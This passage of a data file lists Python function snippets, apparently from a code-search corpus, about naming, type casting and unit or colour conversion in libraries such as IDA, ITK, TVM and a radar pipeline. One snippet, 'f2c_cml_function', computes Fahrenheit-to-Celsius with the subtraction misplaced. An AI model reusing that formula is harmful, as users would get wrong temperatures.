trans_funs[name]", "def map_string2func(funcname, clss, compute_capability):\n if \"_get_\" + funcname not in globals():\n raise AttributeError(\"kernel type '\" + funcname + \"' not understood\")\n return globals()[\"_get_\" + funcname](clss, compute_capability)", "def cfunc_type(self):\n tif = ida_typeinf.tinfo_t()\n result = self.get_func_type(tif)\n if not result:\n return\n return tif", "def get_ctype_name(*args):\n return _ida_hexrays.get_ctype_name(*args)", "def cpp_funcname(self, name, argkinds=None):\n if isinstance(name, basestring):\n return name\n if argkinds is None:\n argkinds = [(Arg.NONE, None)] * (len(name) - 1)\n fname = name[0]\n cts = []\n for x, (argkind, argvalue) in zip(name[1:], argkinds):\n if argkind is Arg.TYPE:\n ct = self.cpp_type(x)\n elif argkind is Arg.LIT:\n ct = self.cpp_literal(x)\n elif isinstance(x, Number):\n ct = self.cpp_literal(x)\n else:\n try:\n ct = self.cpp_type(x) # guess it is a type\n except TypeError:\n ct = x # guess it is a variable\n cts.append(ct)\n fname += '' if 0 == len(cts) else \"< \" + \", \".join(cts) + \" >\"\n return fname", "def cp_name(cp):\n return '%s%04X' % ('u' if cp > 0xffff else 'uni', cp)", "def get_class_decoder_function_name(name):\n name = 
get_class_functional_name(name)\n return 'decode_{0}'.format(name)", "def convert_C_instruction(self, instruction):\n comp, dest, jump = self.parse(instruction)\n\n return f\"111{convert_comp(comp)}{convert_dest(dest)}\" \\\n f\"{convert_jump(jump)}\"", "def as_function_name(self, string):\n return idaapi.COLSTR(string, idaapi.SCOLOR_CNAME)", "def getconversiontype(self, *args, **kwargs):\n return _coordsys.coordsys_getconversiontype(self, *args, **kwargs)", "def _make_class_name(name):\n return name[0].upper() + name[1:] + \"Ufunc\"", "def get_func_type(self, *args):\n return _ida_hexrays.cfunc_t_get_func_type(self, *args)", "def get_cie1931_color_matching_function():\n\n filename = os.path.dirname(os.path.abspath(__file__))\\\n + os.path.normpath(\"/data/cie_1931_color_matching_function.csv\")\n data = np.loadtxt(filename, delimiter=',', skiprows=1).T\n\n return np.uint16(data[0]), data[1:]", "def convertion_name(idn):\n inputn = 'f522_dh.trainingdata_in.lcv.'+idn+'.hdf5'\n outputn = 'jacobian_'+idn+'.npy'\n return(inputn, outputn)", "def _configure_image_name(self, ccd_operation_mode,\n include_star_mag=False):\n dic = ccd_operation_mode\n em_gain = '_G' + str(dic['em_gain'])\n em_mode = 'CONV'\n if dic['em_mode'] == 1:\n em_mode = 'EM'\n hss = '_HSS' + str(dic['hss'])\n preamp = '_PA' + str(dic['preamp'])\n binn = '_B' + str(dic['binn'])\n t_exp = '_TEXP' + str(dic['t_exp'])\n self.image_name = em_mode + hss + preamp + binn + t_exp + em_gain\n\n if include_star_mag:\n star_flux = '_S' + str(self.star_magnitude)\n self.image_name += star_flux", "def name_from_dist(dist_func):\n return str(dist_func).split()[0].split('.')[-1][:-4]", "def conversion(temp, mode):\n if mode == 1:\n c_to_f = (temp * 9/5) + 32\n return c_to_f\n else:\n f_to_c = (temp - 32) * 5 / 9\n return f_to_c", "def cast(*args):\n return _ITKCostFunctionsPython.itkCostFunction_cast(*args)", "def _get_converter(orig, target):\n try:\n func = getattr(utils, f'convert_{orig}_to_{target}')\n except AttributeError:\n func = partial(convert_unit, orig=orig, to=target)\n return func", "def get_func_type(header):\n func_type = header.functionType\n if func_type == SSE.SCALAR:\n return FunctionType.Scalar\n elif func_type == SSE.AGGREGATION:\n return FunctionType.Aggregation\n elif func_type == SSE.TENSOR:\n return FunctionType.Tensor", "def mode(v_o, Vcc):\n if v_o == Vcc:\n return \"positive saturation\"\n if v_o >= -Vcc and v_o <= Vcc:\n return \"linear region\"\n if v_o == -Vcc:\n return \"negative saturation\"", "def getColorTransferFunction(self):\n\t\treturn self.ctf", "def band_to_cname(input_band: str):\n bands_ref = ((\"red\", \"R\"), (\"green\", \"G\"), (\"blue\", \"B\"), ('nir', \"N\"))\n if isinstance(input_band, int) and 1 <= input_band <= 4:\n return bands_ref[input_band-1][0]\n elif isinstance(input_band, str) and len(input_band) == 1:\n for cname, short_name in bands_ref:\n if input_band == short_name:\n return cname\n elif isinstance(input_band, str) and len(input_band) > 1:\n for cname, short_name in bands_ref:\n if input_band == cname:\n return input_band\n else:\n raise ValueError(f\"Cannot convert given band to valid stac common name. 
Got: {input_band}\")", "def createSourceName(self, protocol, pfn):\n return pfn", "def rename(op_name):\n return type(op_name, (OpConverter,), {})", "def _type_name(cls, manual_name):\r\n cf_name = ''\r\n if manual_name:\r\n cf_name = manual_name.lower()\r\n else:\r\n camelcase = re.compile(r'([a-z])([A-Z])')\r\n ccase = lambda s: camelcase.sub(lambda v: '{}_{}'.format(v.group(1), v.group(2).lower()), s)\r\n \r\n cf_name += ccase(cls.__name__)\r\n cf_name = cf_name.lower()\r\n if cls.__use_module_name__:\r\n cf_name = cls.__module__ + '_{}'.format(cf_name)\r\n return cf_name", "def get_chip_fname_fmt(ibs=None, suffix=None):\n if suffix is None:\n chip_cfg = ibs.cfg.chip_cfg\n chip_cfgstr = chip_cfg.get_cfgstr() # algo settings cfgstr\n chip_cfgfmt = chip_cfg['chipfmt'] # png / jpeg (BUGS WILL BE INTRODUCED IF THIS CHANGES)\n suffix = chip_cfgstr + chip_cfgfmt\n # Chip filenames are a function of annotation_rowid and cfgstr\n _cfname_fmt = ('aid_%d' + suffix)\n return _cfname_fmt", "def name_conversion(caffe_layer_name, prefix=''):\n # beginning & end mapping\n NAME_MAP = {\n 'bn_conv1/beta': 'conv0/BatchNorm/beta:0',\n 'bn_conv1/gamma': 'conv0/BatchNorm/gamma:0',\n 'bn_conv1/mean/EMA': 'conv0/BatchNorm/moving_mean:0',\n 'bn_conv1/variance/EMA': 'conv0/BatchNorm/moving_variance:0',\n 'conv1/W': 'conv0/weights:0', 'conv1/b': 'conv0/biases:0',\n 'fc1000/W': 'fc1000/weights:0', 'fc1000/b': 'fc1000/biases:0'}\n if caffe_layer_name in NAME_MAP:\n return prefix + NAME_MAP[caffe_layer_name]\n\n s = re.search('([a-z]+)([0-9]+)([a-z]+)_', caffe_layer_name)\n if s is None:\n s = re.search('([a-z]+)([0-9]+)([a-z]+)([0-9]+)_', caffe_layer_name)\n layer_block_part1 = s.group(3)\n layer_block_part2 = s.group(4)\n assert layer_block_part1 in ['a', 'b']\n layer_block = 0 if layer_block_part1 == 'a' else int(layer_block_part2)\n else:\n layer_block = ord(s.group(3)) - ord('a')\n layer_type = s.group(1)\n layer_group = s.group(2)\n\n layer_branch = int(re.search('_branch([0-9])', caffe_layer_name).group(1))\n assert layer_branch in [1, 2]\n if layer_branch == 2:\n layer_id = re.search('_branch[0-9]([a-z])/', caffe_layer_name).group(1)\n layer_id = ord(layer_id) - ord('a') + 1\n\n TYPE_DICT = {'res':'conv', 'bn':'BatchNorm'}\n name_map = {'/W': '/weights:0', '/b': '/biases:0', '/beta': '/beta:0',\n '/gamma': '/gamma:0', '/mean/EMA': '/moving_mean:0',\n '/variance/EMA': '/moving_variance:0'}\n\n tf_name = caffe_layer_name[caffe_layer_name.index('/'):]\n #print(tf_name)\n if tf_name in name_map:\n tf_name = name_map[tf_name]\n #print(layer_type)\n #if layer_type != 'bn':\n if layer_type == 'res':\n layer_type = TYPE_DICT[layer_type] + (str(layer_id)\n if layer_branch == 2 else 'shortcut')\n elif layer_branch == 2:\n layer_type = 'conv' + str(layer_id) + '/' + TYPE_DICT[layer_type]\n elif layer_branch == 1:\n layer_type = 'convshortcut/' + TYPE_DICT[layer_type]\n tf_name = 'group{}/block{}/{}'.format(int(layer_group) - 2,\n layer_block, layer_type) + tf_name\n return prefix + tf_name", "def name_conversion(caffe_layer_name, prefix=''):\n # beginning & end mapping\n NAME_MAP = {\n 'bn_conv1/beta': 'conv0/BatchNorm/beta:0',\n 'bn_conv1/gamma': 'conv0/BatchNorm/gamma:0',\n 'bn_conv1/mean/EMA': 'conv0/BatchNorm/moving_mean:0',\n 'bn_conv1/variance/EMA': 'conv0/BatchNorm/moving_variance:0',\n 'conv1/W': 'conv0/weights:0', 'conv1/b': 'conv0/biases:0',\n 'fc1000/W': 'fc1000/weights:0', 'fc1000/b': 'fc1000/biases:0'}\n if caffe_layer_name in NAME_MAP:\n return prefix + NAME_MAP[caffe_layer_name]\n\n s = 
re.search('([a-z]+)([0-9]+)([a-z]+)_', caffe_layer_name)\n if s is None:\n s = re.search('([a-z]+)([0-9]+)([a-z]+)([0-9]+)_', caffe_layer_name)\n layer_block_part1 = s.group(3)\n layer_block_part2 = s.group(4)\n assert layer_block_part1 in ['a', 'b']\n layer_block = 0 if layer_block_part1 == 'a' else int(layer_block_part2)\n else:\n layer_block = ord(s.group(3)) - ord('a')\n layer_type = s.group(1)\n layer_group = s.group(2)\n\n layer_branch = int(re.search('_branch([0-9])', caffe_layer_name).group(1))\n assert layer_branch in [1, 2]\n if layer_branch == 2:\n layer_id = re.search('_branch[0-9]([a-z])/', caffe_layer_name).group(1)\n layer_id = ord(layer_id) - ord('a') + 1\n\n TYPE_DICT = {'res':'conv', 'bn':'BatchNorm'}\n name_map = {'/W': '/weights:0', '/b': '/biases:0', '/beta': '/beta:0',\n '/gamma': '/gamma:0', '/mean/EMA': '/moving_mean:0',\n '/variance/EMA': '/moving_variance:0'}\n\n tf_name = caffe_layer_name[caffe_layer_name.index('/'):]\n #print(tf_name)\n if tf_name in name_map:\n tf_name = name_map[tf_name]\n #print(layer_type)\n #if layer_type != 'bn':\n if layer_type == 'res':\n layer_type = TYPE_DICT[layer_type] + (str(layer_id)\n if layer_branch == 2 else 'shortcut')\n elif layer_branch == 2:\n layer_type = 'conv' + str(layer_id) + '/' + TYPE_DICT[layer_type]\n elif layer_branch == 1:\n layer_type = 'convshortcut/' + TYPE_DICT[layer_type]\n tf_name = 'group{}/block{}/{}'.format(int(layer_group) - 2,\n layer_block, layer_type) + tf_name\n return prefix + tf_name", "def itkCostFunction_cast(*args):\n return _ITKCostFunctionsPython.itkCostFunction_cast(*args)", "def scalar_conv(self, round_mode, dst, src):\n # check Scalar\n TikCheckUtil.check_type_match(\n dst, Scalar, 'scalar conv dst must be a scalar')\n TikCheckUtil.check_type_match(\n src, Scalar, 'scalar conv src must be a scalar')\n # check dtype\n dtype_str = DTYPE_MAP[src.dtype] + '2' + DTYPE_MAP[\n dst.dtype] + ROUND_MODE_MAP[round_mode]\n TikCheckUtil.check_equality(api_check_support(\"tik.\" +\n \"scalar_conv\",\n dtype_str), True,\n INSTR_DTYPE_SUPPORT_STATEMENT.\n format(dtype_str, \"scalar_conv\"))\n # code gen\n with self.new_scope():\n # f322s32z: convert f32 to s32, any number out of s32 range\n # will be +/- s32 max number.\n # round mode = Z. 
round to zero(c language trunc)\n if dtype_str in ('s322f32', 'f322f16', 'f162f32', 'f322s32z'):\n self.emit(\n tvm.call_extern(dst.dtype, \"reg_set\", dst.get(),\n dtype_convert(src, dst.dtype)), ONE_IR)\n else:\n self.emit(\n tvm.call_extern(\n dst.dtype, \"reg_set\", dst.get(),\n tvm.call_extern(src.dtype, 'conv_' + dtype_str,\n src.get())), ONE_IR)", "def get_conv_type(filename):\n for conv_type in structured.conv2d_types.keys():\n if conv_type in filename:\n return conv_type\n else:\n log.error(\"Couldn't detect convolution type of\", filename)\n exit(1)", "def swcf(fsntoa, fsntoac):\n var = fsntoa - fsntoac\n var.long_name = \"TOA shortwave cloud forcing\"\n return var", "def src_get_description(converter_type):\n return ffi.string(_lib.src_get_description(converter_type)).decode()", "def get_process_func(dataset_type, dsname):\n\n dsformat = 'VOL'\n if dataset_type == 'RAW':\n func_name = process_raw\n elif dataset_type == 'NCVOL':\n func_name = process_save_radar\n elif dataset_type == 'PWR':\n func_name = 'process_signal_power'\n elif dataset_type == 'SNR':\n func_name = 'process_snr'\n elif dataset_type == 'RHOHV_CORRECTION':\n func_name = 'process_correct_noise_rhohv'\n elif dataset_type == 'BIAS_CORRECTION':\n func_name = 'process_correct_bias'\n elif dataset_type == 'L':\n func_name = 'process_l'\n elif dataset_type == 'CDR':\n func_name = 'process_cdr'\n elif dataset_type == 'SAN':\n func_name = 'process_echo_id'\n elif dataset_type == 'ECHO_FILTER':\n func_name = 'process_echo_filter'\n elif dataset_type == 'SNR_FILTER':\n func_name = 'process_filter_snr'\n elif dataset_type == 'VIS_FILTER':\n func_name = 'process_filter_visibility'\n elif dataset_type == 'OUTLIER_FILTER':\n func_name = 'process_outlier_filter'\n elif dataset_type == 'PHIDP0_CORRECTION':\n func_name = 'process_correct_phidp0'\n elif dataset_type == 'PHIDP_SMOOTH_1W':\n func_name = 'process_smooth_phidp_single_window'\n elif dataset_type == 'PHIDP_SMOOTH_2W':\n func_name = 'process_smooth_phidp_double_window'\n elif dataset_type == 'PHIDP_KDP_MAESAKA':\n func_name = 'process_phidp_kdp_Maesaka'\n elif dataset_type == 'PHIDP_KDP_LP':\n func_name = 'process_phidp_kdp_lp'\n elif dataset_type == 'KDP_LEASTSQUARE_1W':\n func_name = 'process_kdp_leastsquare_single_window'\n elif dataset_type == 'KDP_LEASTSQUARE_2W':\n func_name = 'process_kdp_leastsquare_double_window'\n elif dataset_type == 'ATTENUATION':\n func_name = 'process_attenuation'\n elif dataset_type == 'RAINRATE':\n func_name = 'process_rainrate'\n elif dataset_type == 'WIND_VEL':\n func_name = 'process_wind_vel'\n elif dataset_type == 'WINDSHEAR':\n func_name = 'process_windshear'\n elif dataset_type == 'HYDROCLASS':\n func_name = 'process_hydroclass'\n elif dataset_type == 'PHIDP0_ESTIMATE':\n func_name = 'process_estimate_phidp0'\n elif dataset_type == 'RHOHV_RAIN':\n func_name = 'process_rhohv_rain'\n elif dataset_type == 'ZDR_RAIN':\n func_name = 'process_zdr_rain'\n elif dataset_type == 'SELFCONSISTENCY_KDP_PHIDP':\n func_name = 'process_selfconsistency_kdp_phidp'\n elif dataset_type == 'SELFCONSISTENCY_BIAS':\n func_name = 'process_selfconsistency_bias'\n elif dataset_type == 'TIME_AVG':\n func_name = 'process_time_avg'\n dsformat = 'TIMEAVG'\n elif dataset_type == 'WEIGHTED_TIME_AVG':\n func_name = 'process_weighted_time_avg'\n dsformat = 'TIMEAVG'\n elif dataset_type == 'FLAG_TIME_AVG':\n func_name = 'process_time_avg_flag'\n dsformat = 'TIMEAVG'\n elif dataset_type == 'COLOCATED_GATES':\n func_name = 'process_colocated_gates'\n dsformat = 
'COLOCATED_GATES'\n elif dataset_type == 'INTERCOMP':\n func_name = 'process_intercomp'\n dsformat = 'INTERCOMP'\n elif dataset_type == 'INTERCOMP_TIME_AVG':\n func_name = 'process_intercomp_time_avg'\n dsformat = 'INTERCOMP'\n elif dataset_type == 'MONITORING':\n func_name = 'process_monitoring'\n dsformat = 'MONITORING'\n elif dataset_type == 'SUN_HITS':\n func_name = 'process_sun_hits'\n dsformat = 'SUN_HITS'\n elif dataset_type == 'POINT_MEASUREMENT':\n func_name = process_point_measurement\n dsformat = 'TIMESERIES'\n elif dataset_type == 'TRAJ':\n func_name = process_trajectory\n dsformat = 'TRAJ_ONLY'\n elif dataset_type == 'TRAJ_ATPLANE':\n func_name = process_traj_atplane\n dsformat = 'TIMESERIES'\n elif dataset_type == 'TRAJ_ANTENNA_PATTERN':\n func_name = process_traj_antenna_pattern\n dsformat = 'TIMESERIES'\n else:\n raise ValueError(\"ERROR: Unknown dataset type '%s' of dataset '%s'\"\n % (dataset_type, dsname))\n\n return func_name, dsformat", "def f2c_cml_function():\n import sys\n\n F = float(sys.argv[1])\n C = 5/9.0*F - 32\n print(\"The temperatire in Celcius is {:g}\".format(C))", "def _get_op_str(self):\n import CCAugmentation.outputs as cca_out\n import CCAugmentation.transformations as cca_trans\n\n if type(self.operation) is str:\n op_name_str = self.operation\n else:\n op_name_str = self.operation.__name__\n\n try:\n getattr(cca_trans, op_name_str)\n op_str = f\"cca_trans.{op_name_str}\"\n except AttributeError:\n try:\n getattr(cca_out, op_name_str)\n op_str = f\"cca_out.{op_name_str}\"\n except AttributeError:\n op_str = op_name_str\n\n return op_str", "def cast(*args):\n return _ITKCostFunctionsPython.itkSingleValuedCostFunction_cast(*args)", "def c_cd2cp(s, N):\n color, move = s.strip().split()\n # print('color:{} move:{}'.format(color,move))\n c = color2c(color)\n p = cd2p(move, N)\n return c, p", "def cachename_from_args(undirected, supervised, with_authors, collate_coauthorship):\n name = ''\n if undirected:\n name += 'undirected'\n else:\n name += 'directed'\n name += '-'\n if supervised:\n name += 'supervised'\n else:\n name += 'unsupervised'\n name += '-'\n if with_authors:\n if collate_coauthorship:\n name += 'collated-authors'\n else:\n name += 'first-class-authors'\n else:\n name += 'no-authors'\n return name", "def wrapper_function_name(text):\n text = GLGenerator.split_to_body_and_ext(text)\n body = text[0]\n ext = text[1]\n for suffix, replacement in FUNCTION_SUFFIXES.items():\n if body.endswith(suffix):\n body = body[:-len(suffix)] + replacement\n break\n text = body + ext\n res = util.to_snake_case(text[2:])\n return res", "def function_name(parameters):", "def convert(self, slot):\n return mbv2_predefined_convert_fn(slot)", "def get_loss_fn(kind):\n if kind == 'classic':\n loss_fn = classic_gan_losses\n elif kind == 'nonsaturating':\n loss_fn = nonsaturating_gan_losses\n elif kind == 'wasserstein':\n loss_fn = wasserstein_gan_losses\n elif kind == 'hinge':\n loss_fn = hinge_gan_losses\n return loss_fn", "def convert_color(color, target_cs, through_rgb_type=sRGBColor,\r\n target_illuminant=None, *args, **kwargs):\r\n\r\n if isinstance(target_cs, str):\r\n raise ValueError(\"target_cs parameter must be a Color object.\")\r\n if not issubclass(target_cs, ColorBase):\r\n raise ValueError(\"target_cs parameter must be a Color object.\")\r\n\r\n # Find the origin color space's conversion table.\r\n cs_table = CONVERSION_TABLE[color.__class__.__name__]\r\n try:\r\n # Look up the conversion path for the specified color space.\r\n conversions = 
cs_table[target_cs.__name__]\r\n except KeyError:\r\n raise UndefinedConversionError(\r\n color.__class__.__name__,\r\n target_cs.__name__,\r\n )\r\n\r\n logger.debug('Converting %s to %s', color, target_cs)\r\n logger.debug(' @ Conversion path: %s', conversions)\r\n\r\n # Start with original color in case we convert to the same color space.\r\n new_color = color\r\n\r\n if issubclass(target_cs, BaseRGBColor):\r\n # If the target_cs is an RGB color space of some sort, then we\r\n # have to set our through_rgb_type to make sure the conversion returns\r\n # the expected RGB colorspace (instead of defaulting to sRGBColor).\r\n through_rgb_type = target_cs\r\n\r\n # We have to be careful to use the same RGB color space that created\r\n # an object (if it was created by a conversion) in order to get correct\r\n # results. For example, XYZ->HSL via Adobe RGB should default to Adobe\r\n # RGB when taking that generated HSL object back to XYZ.\r\n # noinspection PyProtectedMember\r\n if through_rgb_type != sRGBColor:\r\n # User overrides take priority over everything.\r\n # noinspection PyProtectedMember\r\n target_rgb = through_rgb_type\r\n elif color._through_rgb_type:\r\n # Otherwise, a value on the color object is the next best thing,\r\n # when available.\r\n # noinspection PyProtectedMember\r\n target_rgb = color._through_rgb_type\r\n else:\r\n # We could collapse this into a single if statement above,\r\n # but I think this reads better.\r\n target_rgb = through_rgb_type\r\n\r\n # Iterate through the list of functions for the conversion path, storing\r\n # the results in a dictionary via update(). This way the user has access\r\n # to all of the variables involved in the conversion.\r\n for func in conversions:\r\n # Execute the function in this conversion step and store the resulting\r\n # Color object.\r\n logger.debug(' * Conversion: %s passed to %s()',\r\n new_color.__class__.__name__, func)\r\n logger.debug(' |-> in %s', new_color)\r\n\r\n if func:\r\n # This can be None if you try to convert a color to the color\r\n # space that is already in. 
IE: XYZ->XYZ.\r\n new_color = func(\r\n new_color,\r\n target_rgb=target_rgb,\r\n target_illuminant=target_illuminant,\r\n *args, **kwargs)\r\n\r\n logger.debug(' |-< out %s', new_color)\r\n\r\n # If this conversion had something other than the default sRGB color space\r\n # requested,\r\n if through_rgb_type != sRGBColor:\r\n new_color._through_rgb_type = through_rgb_type\r\n\r\n return new_color", "def get_func_type(self, *args):\n return _ida_hexrays.cfuncptr_t_get_func_type(self, *args)", "def type_to_sc_type(type_, prefix='sc'):\n return '{}{}'.format(prefix.upper(), type_.title())", "def get_type_functional_name(type):\n name = type.name\n if type.is_simple:\n return name\n elif type.is_enum:\n return 'str'\n elif type.is_complex:\n return get_class_name(name)", "def _name_from_args(func, _, params):\n return \"{}_{}\".format(func.__name__, \"_\".join(str(arg) for arg in params.args))", "def typeToName(type: int) -> unicode:\n ...", "def cast_to(ibuilder, data_amounts, src_buf, dst_buf):\n src_dtype = src_buf.dtype\n dst_dtype = dst_buf.dtype\n if src_dtype == \"float16\" and dst_dtype == \"int32\":\n vconv_instr = \"vconv_f162s32f\"\n vconv_compute_num = VEC_NUMS_HALF\n elif src_dtype == \"float32\" and dst_dtype == \"float16\":\n vconv_instr = \"vconv_f322f16\"\n vconv_compute_num = VEC_NUMS_HALF\n elif src_dtype == \"float32\" and dst_dtype == \"int32\":\n vconv_instr = \"vconv_f322s32f\"\n vconv_compute_num = VEC_NUMS_HALF\n # vconv_s322f32 only support cloud_v100\n elif src_dtype == \"int32\" and dst_dtype == \"float32\":\n vconv_instr = \"vconv_s322f32\"\n vconv_compute_num = VEC_NUMS_HALF\n elif src_dtype == \"int8\" and dst_dtype == \"float16\":\n vconv_instr = \"vconv_s82f16\"\n vconv_compute_num = VEC_NUMS\n elif src_dtype == \"uint8\" and dst_dtype == \"float16\":\n vconv_instr = \"vconv_u82f16\"\n vconv_compute_num = VEC_NUMS\n elif src_dtype == \"float16\" and dst_dtype == \"float32\":\n vconv_instr = \"vconv_f162f32\"\n vconv_compute_num = VEC_NUMS_HALF\n elif src_dtype == \"float16\" and dst_dtype == \"int8\":\n vconv_instr = \"vconv_f162s8f\"\n vconv_compute_num = VEC_NUMS\n elif src_dtype == \"float16\" and dst_dtype == \"uint8\":\n vconv_instr = \"vconv_f162u8f\"\n vconv_compute_num = VEC_NUMS\n\n def compute_stride(src_type, dst_type, vconv_num):\n \"\"\"\n Calculated stride value\n \"\"\"\n perblock_nums_a = compute_perblock_nums(src_type)\n perblock_nums_b = compute_perblock_nums(dst_type)\n src_stride = vconv_num // perblock_nums_a\n dst_stride = vconv_num // perblock_nums_b\n\n return src_stride, dst_stride\n\n src_strides, dst_strides = compute_stride(src_dtype, dst_dtype, vconv_compute_num)\n\n # recheck vconv_instr support\n if not tbe_platform.cce_conf.intrinsic_check_support(\"Intrinsic_vconv\", \\\n vconv_instr.split('_')[1]):\n raise RuntimeError(\"This product don't support Intrinsic_vconv \" + \\\n vconv_instr)\n\n repeats = int(data_amounts // vconv_compute_num)\n remain = int(data_amounts % vconv_compute_num)\n init_times = int(repeats // UINT8_MAX)\n init_remain = int(repeats % UINT8_MAX)\n with ibuilder.if_scope(repeats != 0):\n if init_times != 0:\n with ibuilder.for_range(0, init_times) as rch:\n with ibuilder.new_scope():\n reset_mask_insn(\n ibuilder, dst_buf.dtype, bits=vconv_compute_num)\n ibuilder.emit(tvm.call_extern(dst_buf.dtype, vconv_instr, \\\n dst_buf.access_ptr('w', offset=rch * UINT8_MAX\n * vconv_compute_num), \\\n src_buf.access_ptr('r', offset=rch * UINT8_MAX\n * vconv_compute_num), \\\n 255, 1, 1, dst_strides, src_strides))\n if 
init_remain != 0:\n with ibuilder.new_scope():\n reset_mask_insn(ibuilder, dst_buf.dtype, bits=vconv_compute_num)\n ibuilder.emit(tvm.call_extern(dst_buf.dtype, vconv_instr, \\\n dst_buf.access_ptr('w', offset=init_times * UINT8_MAX\n * vconv_compute_num), \\\n src_buf.access_ptr('r', offset=init_times * UINT8_MAX\n * vconv_compute_num), \\\n init_remain, 1, 1, dst_strides, src_strides))\n\n with ibuilder.if_scope(remain != 0):\n with ibuilder.new_scope():\n mask_len = remain\n reset_mask_insn(ibuilder, dst_buf.dtype, bits=mask_len)\n ibuilder.emit(tvm.call_extern(dst_buf.dtype, vconv_instr, \\\n dst_buf.access_ptr('w', offset=repeats\n * vconv_compute_num), \\\n src_buf.access_ptr('r', offset=repeats\n * vconv_compute_num), \\\n 1, 1, 1, 0, 0))", "def _name_to_func(self, cmd_name: str):\n if cmd_name not in SUPPORTED_COMMANDS:\n # redis remaps \\r or \\n in an error to ' ' to make it legal protocol\n clean_name = cmd_name.replace(\"\\r\", \" \").replace(\"\\n\", \" \")\n raise SimpleError(msgs.UNKNOWN_COMMAND_MSG.format(clean_name))\n sig = SUPPORTED_COMMANDS[cmd_name]\n func = getattr(self, sig.func_name, None)\n return func, sig", "def converter(c, f):\n u,v,w,x,y = [connector() for _ in range(5)]\n multiplier(c, w, u)\n multiplier(u, x, v)\n adder(v, y, f)\n constant(w, 9)\n constant(x, 5)\n constant(y, 32)", "def getFunctionStyle(self,cpArray,X0):\n cpArray=tf.cast(tf.convert_to_tensor(cpArray),dtype=tf.float64)\n X0 = tf.cast(tf.convert_to_tensor(X0),dtype=tf.float64)\n func = self.lamda_computeCPdiff(X0)\n gatheredCps = tf.map_fn(func,cpArray,parallel_iterations=32,back_prop=False)\n return gatheredCps", "def converter(c, f):\n u, v, w, x, y = [connector() for _ in range(5)]\n multiplier(c, w, u)\n multiplier(v, x, u)\n adder(v, y, f)\n constant(x, 5)\n constant(w, 9)\n constant(y, 32)", "def input_name_from_func_name(func_name):\n\treturn os.path.join(INPUTS_DIR, ''.join(func_name.split('make_')[1:])) \\\n\t\t\t+ '.%s' % EXTENSION", "def _cc(self, args):\n if isinstance(args, str):\n return args\n try:\n r, g, b = args\n except (TypeError, ValueError):\n raise TurtleGraphicsError(\"bad color arguments: %s\" % str(args))\n if self.screen._colormode == 1.0:\n r, g, b = [round(255.0*x) for x in (r, g, b)]\n if not ((0 <= r <= 255) and (0 <= g <= 255) and (0 <= b <= 255)):\n raise TurtleGraphicsError(\"bad color sequence: %s\" % str(args))\n return \"#%02x%02x%02x\" % (r, g, b)", "def make_convertor(name, dtype):\n\n # The spaces may be important in the strings, but don't think\n # they are for my use case, so remove them.\n #\n if dtype == 'char':\n if name.endswith('_flag'):\n return convert_to_bool\n else:\n return lambda v: v.strip()\n elif dtype == 'int':\n return convert_to_int\n elif dtype == 'double':\n return convert_to_float\n elif dtype == 'boolean':\n return convert_to_bool\n else:\n raise ValueError(dtype)", "def _fc_function_definitions(self) -> str:\n result = 'extern \"C\" {\\n\\n'\n for namespace in self.namespaces:\n for member in namespace.members:\n result += member.fortran_c_wrapper()\n\n result += '}\\n\\n'\n return result", "def format_functor(name, arity=None):\n if arity is not None:\n return '%s/%d' % (name, arity)\n elif type(name) is str:\n return name\n else:\n return '%s/%d' % name", "def conversion_to_string(cv_code):\n strs = {cv2.COLOR_BGR2GRAY:\"bgr to gray\",\n cv2.COLOR_BGR2HSV:\"bgr to hsv\",\n cv2.COLOR_BGR2Luv:\"bgr to Luv\",\n cv2.COLOR_BGR2XYZ:\"bgr to xyz\",\n cv2.COLOR_BGR2YCrCb:\"bgr to YCrCb\",\n cv2.COLOR_BGR2HLS:\"bgr to hls\",\n 
cv2.COLOR_BGR2Lab: \"bgr to Lab\"}\n return strs[cv_code]", "def primitive(self, arg: SeField[Any]) -> str:\n typ = typename(arg.type)\n var = arg.varname\n if self.suppress_coerce:\n return var\n else:\n return f\"coerce({typ}, {var})\"", "def _deviceVariableFunctionName(self, tree, permitted_prefixes, allow_lengths = True):\n cpp_func_name = \"\"\n py_func = tree.attr\n # extract function name start\n for prefix in permitted_prefixes:\n if py_func.startswith(prefix):\n cpp_func_name = prefix\n py_func = py_func[len(prefix):]\n break # dont allow the else\n else:\n return None\n # check type and lengths\n if allow_lengths:\n #split to get type and Array Length (This could **potentially** be looked up from the model description but current syntax is consistent with swig bindings) \n type_and_length = py_func.split(\"Array\")\n if type_and_length[0] not in self._fgpu_types:\n self.RaiseError(tree, f\"'{type_and_length[0]}' is not a valid FLAME GPU type\")\n t = self._fgpu_types[type_and_length[0]]\n # generate template args\n if (len(type_and_length) == 1):\n cpp_func_name += f\"<{t}>\"\n elif (len(type_and_length) == 2):\n cpp_func_name += f\"<{t}, {type_and_length[1]}>\"\n else:\n return None\n else:\n if py_func not in self._fgpu_types:\n self.RaiseError(tree, f\"'{py_func}' is not a valid FLAME GPU type\")\n t = self._fgpu_types[py_func]\n cpp_func_name += f\"<{t}>\"\n # return \n return cpp_func_name", "def core_name(self):\n buf_size = self.MAX_BUF_SIZE\n buf = (ctypes.c_char * buf_size)()\n self._dll.JLINKARM_Core2CoreName(self.core_cpu(), buf, buf_size)\n return ctypes.string_at(buf).decode()", "def _colorstr(self, args):", "def config_identifier(converter, model_name):\n return model_name.lower().replace('-', '_') + '_' + converter", "def conversion(arg1, arg2=None, name=None, cost=None):\n if arg2 is None:\n return conversion_method(arg1, name=name, cost=cost)\n else:\n return computation(arg1, arg2, name=name, cost=cost)", "def get_func_name(func, resolv_alias=True, win_characters=True):\r\n if hasattr(func, '__module__'):\r\n module = func.__module__\r\n else:\r\n try:\r\n module = inspect.getmodule(func)\r\n except TypeError:\r\n if hasattr(func, '__class__'):\r\n module = func.__class__.__module__\r\n else:\r\n module = 'unknown'\r\n if module is None:\r\n # Happens in doctests, eg\r\n module = ''\r\n if module == '__main__':\r\n try:\r\n filename = os.path.abspath(inspect.getsourcefile(func))\r\n except:\r\n filename = None\r\n if filename is not None:\r\n # mangling of full path to filename\r\n parts = filename.split(os.sep)\r\n if parts[-1].startswith('<ipython-input'):\r\n # function is defined in an IPython session. The filename\r\n # will change with every new kernel instance. 
